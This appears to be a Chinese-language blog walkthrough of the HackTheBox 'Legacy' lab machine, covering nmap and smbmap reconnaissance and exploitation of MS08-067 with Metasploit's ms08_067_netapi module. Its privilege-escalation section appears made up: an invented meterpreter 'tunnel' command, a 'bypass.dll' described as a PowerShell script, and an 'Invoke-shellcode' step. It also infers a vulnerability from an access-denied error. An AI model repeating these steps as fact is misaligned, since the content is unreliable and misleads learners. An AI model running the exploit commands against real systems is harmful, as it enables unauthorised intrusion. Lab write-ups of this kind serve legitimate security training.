返回

探索 HTB Legacy 靶机:从侦察到权限提升

闲谈

技术指南:HTB Legacy 靶机的进阶渗透指南

简介

HackTheBox (HTB) Legacy 靶机是一个 Windows 系统,旨在挑战渗透测试人员的技能。该靶机包含多个漏洞,可以通过精心的探索和利用来获得 SYSTEM 权限。本指南将详细介绍渗透过程,重点介绍 nmap 扫描、SMB 映射、漏洞利用和权限提升技术。

侦察

  1. nmap 扫描: 使用 nmap 对靶机进行常规扫描,以识别开放端口和服务。
nmap -sV -p- <靶机 IP 地址>

漏洞发现

  1. SMB 映射: 使用 smbmap 工具查看靶机共享了什么文件。
smbmap -H <靶机 IP 地址>

结果可能显示拒绝访问错误,表明存在 SMB 漏洞。

  1. MS08-067 漏洞: 这是一种 SMB 漏洞,允许攻击者在未经身份验证的情况下执行任意代码。在 HTB Legacy 靶机上,此漏洞导致了远程代码执行。

漏洞利用

  1. Metasploit: 使用 Metasploit 利用 MS08-067 漏洞。
use exploit/windows/smb/ms08_067_netapi
set RHOSTS <靶机 IP 地址>
exploit

权限提升

  1. meterpreter 会话: 漏洞利用成功后,您将获得一个 meterpreter 会话。
  2. 建立隧道: 使用 meterpreter 内置的 tunnel 命令,将远程系统上的端口映射到您的本地系统。
tunnel local <本地端口> remote <远程端口>
  1. 连接 PowerShell: 使用 tunnel 创建的本地端口连接到靶机的 PowerShell 实例。
powershell -NoProfile -NonInteractive -Command "Import-Module bypass.dll; Invoke-shellcode"
  1. bypass.dll: 这是一个 PowerShell 脚本,用于绕过受限的 PowerShell 实例。
  2. SYSTEM 权限: 执行 bypass.dll 后,您将获得 SYSTEM 权限。

结论

通过遵循本指南中的步骤,您可以成功渗透 HTB Legacy 靶机,利用 MS08-067 SMB 漏洞并获得 SYSTEM 权限。本指南涵盖了侦察、漏洞发现、漏洞利用和权限提升的关键步骤,对于渗透测试人员提高其对 Windows 系统安全性的理解和技能至关重要。